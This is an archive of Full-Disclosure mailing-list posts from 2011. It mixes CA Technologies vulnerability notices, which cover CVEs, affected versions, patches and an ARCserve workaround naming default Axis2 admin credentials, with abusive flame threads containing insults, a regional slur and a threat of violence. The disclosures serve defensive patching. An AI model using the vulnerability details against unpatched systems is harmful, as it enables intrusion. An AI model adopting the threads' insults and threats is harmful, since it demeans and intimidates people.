>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com

--
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[James Lay]

On 4/28/11 4:09 AM, "Tõnu Samuel"  wrote:

>
>admin interface of product. Even more irritating was fact that admin
>wanted to see why some e-mails were lost and was denied even to see logs!
>


Hehyank the drive and mount it in a linux box...it's just Mandrake
linux anyways (most likely going against GPL since they are using ClamAV
and SpamAssassin).

J


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20110420-01: Security Notice for CA SiteMinder

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110420-01: Security Notice for CA SiteMinder


Issued:  April 20, 2011


CA Technologies support is alerting customers to a security risk 
associated with CA SiteMinder. A vulnerability exists that can allow a 
malicious user to impersonate another user.  CA Technologies has 
issued patches to address the vulnerability.

The vulnerability, CVE-2011-1718, is due to improper handling of 
multi-line headers. A malicious user can send specially crafted data 
to impersonate another user.


Risk Rating 

Medium


Platform 

Windows


Affected Products 

CA SiteMinder R6 Web Agents prior to R6 SP6 CR2
CA SiteMinder R12 Web Agents prior to R12 SP3 CR2


How to determine if the installation is affected 

Check the Web Agent log to obtain the installed release version. Note 
that the "webagent.log" file name is configurable by the SiteMinder 
administrator.


Solution

CA has issued patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR2 or later

CA SiteMinder R12: 
Upgrade to R12 SP3 CR2 or later

CR releases can be found on the CA SiteMinder Hotfix / Cumulative 
Release page:
(URL may wrap)
support.ca.com/irj/portal/anonymous/phpdocs?filePath=0/5262/5262_fixinde
x.h
tml


References

CVE-2011-1718 - CA SiteMinder Multi-line Header Vulnerability


Acknowledgement

April King (ap...@twoevils.org)


Change History

Version 1.0: Initial Release


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj4DBQFNr6uXeSWR3+KUGYURAvcnAKCVdxdKNawQQC/M/wK9tDk5gD6jzQCTByZ/
X9MjXhbKg9eeMFDPXdrxlA==
=nwb+
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20110420-02: Security Notice for CA Output Management Web Viewer

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110420-02: Security Notice for CA Output Management Web Viewer


Issued:  April 20, 2011


CA Technologies support is alerting customers to security risks 
associated with CA Output Management Web Viewer. Two vulnerabilities 
exist that can allow a remote attacker to execute arbitrary code.  CA 
Technologies has issued patches to address the vulnerabilities.

The vulnerabilities, CVE-2011-1719, are due to boundary errors in the 
UOMWV_HelperActiveX.ocx and PPSView.ocx ActiveX controls. A remote 
attacker can create a specially crafted web page to exploit the flaws 
and potentially execute arbitrary code.


Risk Rating 

High


Platform 

Windows


Affected Products 

CA Output Management Web Viewer 11.0 
CA Output Management Web Viewer 11.5


How to determine if the installation is affected 

If the end-user controls are at a version that is less than the 
versions listed below, the installation is vulnerable.


File Name Version 

UOMWV_HelperActiveX.ocx   11.5.0.1 
PPSView.ocx   1.0.0.7


Solution

CA has issued the following patches to address the vulnerability.

CA Output Management Web Viewer 11.0:
Apply the RO29119 APAR, and then have end-users allow updated controls 
to be installed (on next attempt to use impacted feature).

CA Output Management Web Viewer 11.5:
Apply the RO29120 APAR, and then have end-users allow updated controls 
to be installed (on next attempt to use impacted feature).


References

CVE-2011-1719 - CA Output Management Web Viewer ActiveX Control Buffer 
Overflows


Acknowledgement

Dmitriy Pletnev, Secunia Research


Change History

Version 1.0: Initial Release


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj4DBQFNr5KCeSWR3+KUGYURAseNAKCUFddGhEHrb3JBUABbqWWvGgvZTQCY9nHy
V9Eya1SCGQ8B2kt6v50jNw==
=Y75y
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Hacking The Trading Floor Talk code wanted

[James Kerry]

Hi,

I am desperately trying to access the code for this talk ?! Can someone
please advice where I could possible find this info ?

http://www.slideshare.net/iffybird_099/hacking-the-trading-floor-7613988


Kind Regards,

J Kerry
MSc, CCIE, CCNA
Rapport Capital Technologies
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20110223-01: Security Notice for CA Host-Based Intrusion Prevention System

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110223-01: Security Notice for CA Host-Based Intrusion Prevention 
System

Issued: February 23, 2011
Updated: February 24, 2011


CA Technologies support is alerting customers to a security risk 
associated with CA Host-Based Intrusion Prevention System (HIPS). A 
vulnerability exists that can allow a remote attacker to execute 
arbitrary code.  CA Technologies has issued patches to address the 
vulnerability.

The vulnerability, CVE-2011-1036, is due to insecure method 
implementation in the XMLSecDB ActiveX control that is utilized in CA 
HIPS components and products. A remote attacker can potentially execute 
arbitrary code if he can trick a user into visiting a malicious web 
page or opening a malicious file.


Risk Rating 
Medium


Platform 
Windows


Affected Products 
CA Host-Based Intrusion Prevention System (HIPS) r8.1
CA Internet Security Suite (ISS) 2010
CA Internet Security Suite (ISS) 2011


How to determine if the installation is affected 
HIPS Management Server is vulnerable if the version number is less than 
8.1.0.88.

HIPS client sources are vulnerable if the build number is less than 
1.6.450.

CA Internet Security Suite (ISS) 2010 is vulnerable if the ISS product 
version is equal to or less than 6.0.0.285 and the HIPS version is 
equal to or less than 1.6.384.

CA Internet Security Suite (ISS) 2011 is vulnerable if the ISS product 
version is equal to or less than 7.0.0.115 and the HIPS version is 
equal to or less than 1.6.418.

Older versions of HIPS and ISS, that are no longer supported, may also 
be vulnerable.


Solution

CA has issued the following patches to address the vulnerability.

CA Host-Based Intrusion Prevention System (HIPS) r8.1:
RO26950
Apply RO26950 and set the DWORD "ProtectParser" under 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmxCfg to "1". You 
do not need to restart the client.

CA Internet Security Suite (ISS) 2010:
Fix information will be published soon.

CA Internet Security Suite (ISS) 2011:
Fix information will be published soon.


References

CVE-2011-1036 - CA HIPS XMLSecDB ActiveX control insecure methods


Acknowledgement

Andrea Micalizzi aka rgod, via TippingPoint ZDI


Change History

Version 1.0: Initial Release
Version 1.5: Added ISS 2011 to list of affected products. Added 
instructions for determining if ISS is affected.


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFNZypeeSWR3+KUGYURAmbuAJ9tD5x666uOpX6ia6ksu4rdnksyggCfSwCn
kb1ylRiLIRzRg3j1VygjImQ=
=M+5z
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New tool for penetration testing!!!

[James Lay]

From:  runlvl 
Date:  Mon, 21 Feb 2011 02:57:58 -0300
To:  Full-disclosure 
Subject:  [Full-disclosure] New tool for penetration testing!!!

Insecurity Research is happy to announce the release of version 2.0,
get it now while it is still hot !

Insect Pro 2.0 is a penetration security auditing and testing software
solution designed to allow organizations of all sizes mitigate,
monitor and manage the latest security threats vulnerabilities.

We¹re always working to improve Insect Pro and now the users obtain
all the metasploit functionalities plus all the Insect Pro modules
merge all in a unique application.

We invite you to take a visual tour where you can find screen shots and
videos, visit us at http://www.insecurityresearch.com


We are really thankful with the community, thanks for all your support
that keep us coding!

There is no fixed price to get it, you can obtain the full version
with updates from $20 !

Get it now from: http://www.insecurityresearch.com





This is really starting to look like spamŠ..



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Rankin, James R]

Sue me. Dickhead. My contribution here is over. Don't forget about the train.

Bye,

Typed frustratingly slowly on my BlackBerry® wireless device

-Original Message-
From: "andrew.wallace" 
Date: Thu, 17 Feb 2011 14:49:46 
To: valdis.kletni...@vt.edu; 
kz2...@googlemail.com
Reply-To: "andrew.wallace" 
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (this thread is now abo
 ut porn).‏

On Thu, Feb 17, 2011 at 10:04 PM,   wrote:
> You *do* realize we have very little proof that the entity posting
> as Cal isn't a sock puppet of Andrew's creation, to further his vendetta
> against full disclosure because it helps the cyber-terrorists?  It's the
> sort of thing that one of England's top cyber-security experts would do,
> isn't it? :)

On Thu, Feb 17, 2011 at 10:10 PM, Rankin, James R  wrote:
> I am an alter ego of netty's that he has invented to argue with in case the 
> voices in his head stop talking about national security

The right to free expression can be restricted if this is necessary to protect 
the reputation of others. The law of defamation allows persons who consider 
that their reputation has been or may be harmed by statements made by others to 
sue for damages or to prevent the making of those statments. 
http://www.yourrights.org.uk/yourrights/right-of-free-expression/defamation/index.html

You're treading on very thin ice.

Andrew




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn) .‏

[Rankin, James R]

I am an alter ego of netty's that he has invented to argue with in case the 
voices in his head stop talking about national security

Typed frustratingly slowly on my BlackBerry® wireless device

-Original Message-
From: valdis.kletni...@vt.edu
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Thu, 17 Feb 2011 17:04:25 
To: phocean<0...@phocean.net>
Cc: full-disclosure@lists.grok.org.uk; 
andrew.wallace
Subject: Re: [Full-disclosure]
(this thread is now about porn) .

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[Rankin, James R]

That is so rich coming from you. I am not even gonna bother digging up your old 
posts.

Typed frustratingly slowly on my BlackBerry® wireless device

-Original Message-
From: "andrew.wallace" 
Date: Thu, 17 Feb 2011 09:28:42 
To: Cal Leeming \[Simplicity Media Ltd\]
Reply-To: "andrew.wallace" 
Cc: \"\"\"kz2...@googlemail.com\"\"\"; 
\"\"\"ot48...@gmail.com\"\"\"; 
\"\"\"full-disclosure@lists.grok.org.uk\"\"\";
 \"\"\"datski...@gmail.com\"\"\"; 
\"\"\"bka...@ford.com\"\"\"; Paul 
Schmehl
Subject: Re: [Full-disclosure] from hbgary: stuxnet, W
 L attack, Psyop and Anonymous trackdown‏

On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl  wrote:
> Does anyone on this list really give a crap that you guys like publicly
> pulling your puds?
>
> At some point in life, most people grow up.

On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming [Simplicity Media Ltd] 
 wrote:

> I disagree. Unless you are the bitch who hands out the tea and biscuits.

Like Paul said, you have a lot of growing up to do, that's why people want you 
off the list.

Andrew




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[James Rankin]

Do you know what the Atlas project is?

On 17 February 2011 16:26, andrew.wallace wrote:

> On Thu, Feb 17, 2011 at 4:11 PM, James Rankin 
> wrote:
> > I don't want to be invited for cross-dressing talks with you, you
> delusional
> > moron
> >
> > Get back down the pub.
> >
> > A long way to go? I make good money from my career, matey. (Career. Ever
> > heard of one?) You on the other hand are firmly wedged in cloud-cuckoo. I
> > work for the government at the minute, and no-one here has ever heard of
> > you.
> >
> > Goodnight.
>
> Perhaps you work for a local government authority, however you aren't
> involved with any central government organisation in Cheltenham or London.
>
> The way you talk to people, you are unlikely to be involved in anything
> meaningful within the government, perhaps a local authority though.
>
> Andrew
>
>


-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have any legal or no
grammatical use and may be ignored. No animals were harmed in the
transmission of this email, although the kelpie next door is living on
borrowed time, let me tell you. Those of you with an overwhelming fear of
the unknown will be gratified to learn that there is no hidden message
revealed by reading this warning backwards, so just ignore that Alert Notice
from Microsoft.

However, by pouring a complete circle of salt around yourself and your
computer you can ensure that no harm befalls you and your pets. If you have
received this email in error, please add some nutmeg and egg whites, whisk
and place in a warm oven for 40 minutes.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[James Rankin]

I don't want to be invited for cross-dressing talks with you, you delusional
moron

Get back down the pub.

A long way to go? I make good money from my career, matey. (Career. Ever
heard of one?) You on the other hand are firmly wedged in cloud-cuckoo. I
work for the government at the minute, and no-one here has ever heard of
you.

Goodnight.

On 17 February 2011 14:50, andrew.wallace wrote:

> On Thu, Feb 17, 2011 at 2:20 PM, James Rankin 
> wrote:
> > No-one in the UK or UK security community has heard of Nettie or his
> > consultancy.
> >
> > He's just a deluded Jocko pisspot
>
> I've been a member for the last 12 years and frequent industry conferences
> regularly, as well as chair roundtable discussions between the sectors. I
> doubt you've ever been involved in any of that, because speaking to me in
> the manner you are, you are unlikely to be invited for cross-industry talks
> with anyone.
>
> Learn to respect others and get on with people instead of posting abusive
> messages to mailing lists, and you may get invited into talks between the
> government and the private sector.
>
> Judging by your email though it seems you have a long way to go.
>
> Andrew
>
>


-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have any legal or no
grammatical use and may be ignored. No animals were harmed in the
transmission of this email, although the kelpie next door is living on
borrowed time, let me tell you. Those of you with an overwhelming fear of
the unknown will be gratified to learn that there is no hidden message
revealed by reading this warning backwards, so just ignore that Alert Notice
from Microsoft.

However, by pouring a complete circle of salt around yourself and your
computer you can ensure that no harm befalls you and your pets. If you have
received this email in error, please add some nutmeg and egg whites, whisk
and place in a warm oven for 40 minutes.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

[James Rankin]

No-one in the UK or UK security community has heard of Nettie or his
consultancy.

He's just a deluded Jocko pisspot

On 17 February 2011 14:01, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> I refer everyone to:
>
>
> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
>
>
> On Thu, Feb 17, 2011 at 1:51 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> On Wed, Feb 16, 2011 at 5:54 PM, Old Timer  wrote:
>> > andrew:
>> >
>> > "Cal is a blackhat with criminal convictions, I hope he is forced from
>> the
>> > list by an uprising of whitehats.
>> >
>> > I'm a whitehat and its upsetting to see the disclosure community being
>> taken
>> > over by criminals.
>> >
>> > Andrew"
>> >
>> >
>> > hahahah
>> >
>> > Why don't you have a quick glance at the list charter and see who
>> founded
>> > this list ?  Then go look them up in wikipedia
>> >
>> > While yer at it, check out Scott Chasin, who founded bugtraq...
>> >
>> > And 8lgm, who were prolific bugtraq posters...
>> >
>> > the list goes on and on (and on and on).  How old are you, son ?
>>
>> n3td3v - Brief history of the consortium and timeline
>>
>> How We Started
>>
>> * Founded by entrepreneur and IT Security Consultant, Andrew Wallace.
>>
>> * The aged 30-something year old was born in 1981 and started the
>> consultancy at the young age of 18.
>>
>> * n3td3v - IT Security Consultancy was founded in 1999 and helped the
>> entrepreneur launch his career in IT Security.
>>
>> * Today, 2011, we are one of the most well known non-profit IT Security
>> consortia in the UK.
>>
>> Learn more: https://sites.google.com/site/n3td3v/
>>
>> Andrew
>>
>>
>>
>>
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have any legal or no
grammatical use and may be ignored. No animals were harmed in the
transmission of this email, although the kelpie next door is living on
borrowed time, let me tell you. Those of you with an overwhelming fear of
the unknown will be gratified to learn that there is no hidden message
revealed by reading this warning backwards, so just ignore that Alert Notice
from Microsoft.

However, by pouring a complete circle of salt around yourself and your
computer you can ensure that no harm befalls you and your pets. If you have
received this email in error, please add some nutmeg and egg whites, whisk
and place in a warm oven for 40 minutes.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[James Rankin]

Nettie (and that isn't a term of endearment - see
http://en.wiktionary.org/wiki/nettie)

Please bog off. You make me ashamed to be British. Anyone with a burgeoning
consultancy would shut the hell up about it, not bawl about it on FD.

I have to say that your trolling is first-class though. I am an FD lurker,
not a contributor, yet you have wound me up enough to respond. For that,
well done.

Now sod off. I am only a short train ride from your neck of the woods, and I
would love to kick your ass for plaguing my inbox again.

Adios,

On 10 February 2011 16:32, andrew.wallace wrote:

> Thankfully you are very rarely involved with public and private sector
> business talks in the UK, so the situation will probably never arise we are
> in the same board room.
>
> Stay in America and keep away from the UK is the best thing that could ever
> happen to you, because frankly meeting you would be a complete nightmare for
> me and I would find it hard to work with you on any meaningful level.
>
> One thing for sure is you have pissed me off with the way you speak to me
> via private email and your perceived perception of who I am, and what you
> think n3td3v is.
>
> Maybe in the beginning it seemed like disorganised non-sense to you, but it
> has evolved and shaped over the years with me and is now a serious force to
> be reckoned with and is able to compete with other consultancy orgainsations
> in the UK, now that there are serious consultants on board from the business
> and government sector in the UK, where we work on meaningful policy reform
> within organisations, to tighten security against foreign powers, terrorist
> attacks and other matters.
>
> To be perfectly honest, I would like to say, I think you've been reading
> mailing lists too much, a lot more goes on in industry than the stupid
> disclosure community, work actually gets done that is meaningful and
> satisfying when I come home at night.
>
> My advice to you is, stop reading mailing lists, get on with the physical
> industry and stop basing your views of people based on back and forward
> horse play people have have had between 2004-2009.
>
> That part of n3td3v is behind you, me and everyone, I removed the mailing
> list as a symbolic gesture to move on from that.
>
> I'm now a professional, consulting and liaising with other consultants in
> the UK in the public and private sector through the consortium, the
> consultants who ive had dealings with in the physical domain who have
> decided to join through knowing me in a working relationship.
>
> The organisation is nothing to do with what it might have been, n3td3v is
> rethought and matured, along with me.
>
> You couldn't possibly say the same orgainsation I started when I was 18 is
> going to be the same orgainsation today now that I'm 30, it isn't.
>
> I've changed, we've changed, the type of people I come into contact has
> changed through opportunities I've gained in the physical domain.
>
> n3td3v is very much nothing to do with anything online-based, but has
> shifted into the physical domain, in that, its people I actually know who I
> can shake hands with who are members.
>
> That is why the name was changed, the brand, its now a consortium, its
> nothing to do with online or some silly Google group mailing list.
>
> The beginning days of n3td3v between 2004-2009 and the Google group mailing
> list was used to pushed my name out into the industry to become known, you
> should be able to work with me in a meaningful working relationship if you
> ever had to through work commitments.
>
> Everyone else who I meet in the physical domain knows who I am, but they
> don't judge me for it, they shake my hand and move on with the problems in
> the industry that are needing solved.
>
> They don't say, that's Andrew who used to post in the disclosure community,
> let's huff and puff about it.
>
> They take me as I am in the physical domain, realise it was silly horse
> play from the past and move on.
>
> I hope you are able to do the same, because your attitude just annoys me
> that you cannot have a mature and professional approach in the way you talk
> with me.
>
> Andrew
>
>


-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have a

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[James Rankin]

The guy is a feeble Jock troll who obviously thought this whole "National
Security" thing would get him laid.

I have to admit grudging admiration for his tenacity in that he is still
trying to make it work. Determination alone, though, does not an infosec
professional make.

On 10 February 2011 15:22,  wrote:

> On Thu, 10 Feb 2011 14:49:15 +0100, Christian Sciberras said:
> > Why didn't we all think about it in the first place!
> > A conspiracy, so OBVIOUS!!
>
> > On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> > andrew.wall...@rocketmail.com> wrote:
> > > It is obvious they don't want people like me and my organisation who
> deal
> > > in national security on the list, that is why the moderation was
> > > implemented.
>
> Yep, some huge shadowy "national security organization" that nobody but the
> leader admits being a part of, it must be a conspiracy.  I wonder who out
> there
> is a sleeper agent.  Consider Gadi Evron, Marcus Sachs, and myself -
> Andrew's
> done so much to distance himself from all three of us that we must all be
> sleeper agents.  Think about that.. and who *else* might be part of the
> conspiracy.  It could go deeper than even Andrew realizes...
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have any legal or no
grammatical use and may be ignored. No animals were harmed in the
transmission of this email, although the kelpie next door is living on
borrowed time, let me tell you. Those of you with an overwhelming fear of
the unknown will be gratified to learn that there is no hidden message
revealed by reading this warning backwards, so just ignore that Alert Notice
from Microsoft.

However, by pouring a complete circle of salt around yourself and your
computer you can ensure that no harm befalls you and your pets. If you have
received this email in error, please add some nutmeg and egg whites, whisk
and place in a warm oven for 40 minutes.*
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20101231-01: Security Notice for CA ARCserve D2D (updated)

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20101231-01: Security Notice for CA ARCserve D2D

Issued: December 31, 2010
Last Updated: January 26, 2011

CA Technologies support is alerting customers to a security risk with 
CA ARCserve D2D. A vulnerability exists that can allow a remote 
attacker to execute arbitrary code.  CA has issued an Information 
Solution to address the vulnerability.

The vulnerability is due to default vulnerabilities inherent in the 
Tomcat and Axis2 3rd party software components. A remote attacker can 
exploit the implementation to execute arbitrary code.


Risk Rating 

High


Platform 

Windows


Affected Products 

CA ARCserve D2D r15


How to determine if the installation is affected 

Using Windows Explorer, go to the directory 
"\TOMCAT\webapps\WebServiceImpl", and look for the existence 
of a folder called "axis2-web".


Solution

CA has issued the following patch to address the vulnerability.

CA ARCserve D2D r15:
RO26040

If you are not able to apply the patch at this time, the following 
workaround can be implemented to address the vulnerability.

1.  Stop "CA ARCserve D2D Web Service" from service control manager.

2.  Go to the directory "\TOMCAT\webapps\WebServiceImpl", 
and remove the folder "axis2-web".

3.  Edit "\TOMCAT\webapps\WebServiceImpl\WEB-INF\web.xml", 
and remove the content of AxisAdminServlet's servlet and servlet 
mapping. 
 
The content to remove will look like the text below:

- 
Apache-Axis Admin Servlet Web Admin
AxisAdminServlet
org.apache.axis2.transport.http.\
   AxisAdminServlet
100
  
- 
AxisAdminServlet
/axis2-admin/*
  

4.  Change the username and password parameters in the axis2.xml file 
to stronger credentials that conform to your organization's 
password policies. 
"\TOMCAT\webapps\WebServiceImpl\WEB-INF\conf\axis2.xml"
   
   admin
   axis2

5.  Start "CA ARCserve D2D Web Service".


References

CVE-201X- - CVE Reference Pending

CA ARCserve D2D r15 Web Service Apache Axis2 World Accessible Servlet 
Code Execution Vulnerability Poc Dec 30 2010 11:04AM
http://www.securityfocus.com/archive/1/515494/30/0/threaded
http://marc.info/?l=bugtraq&m=129373168501496&w=2

Computer Associates ARCserve D2D r15 Web Service Apache Axis2 World 
Accessible Servlet Code Execution Vulnerability Poc
http://retrogod.altervista.org/9sg_ca_d2d.html


Acknowledgement

rgod


Change History

Version 1.0: Initial Release
Version 2.0: Added patch information


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFNQeWgeSWR3+KUGYURAmdOAJwMqjF7lfNulYGlU9kpBC0/7G7E7gCfSO3z
5v7+N15N6Gbuds7+vrMbRRk=
=zbTD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20101231-01: Security Notice for CA ARCserve D2D

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20101231-01: Security Notice for CA ARCserve D2D
Issued: December 31, 2010

CA Technologies support is alerting customers to a security risk with CA

ARCserve D2D. A vulnerability exists that can allow a remote attacker to

execute arbitrary code.  CA has issued an Information Solution to
address 
the vulnerability.

The vulnerability is due to default vulnerabilities inherent in the
Tomcat 
and Axis2 3rd party software components. A remote attacker can exploit
the 
implementation to execute arbitrary code.


Risk Rating 

High


Platform 

Windows


Affected Products 

CA ARCserve D2D r15


How to determine if the installation is affected 

Using Windows Explorer, go to the directory 
"\TOMCAT\webapps\WebServiceImpl", and look for the existence
of a 
folder called "axis2-web".


Solution

A permanent solution will be posted soon at https://support.ca.com/

In the meantime, the following workaround can be implemented to address
the
vulnerability.

1.  Stop "CA ARCserve D2D Web Service" from service control manager.

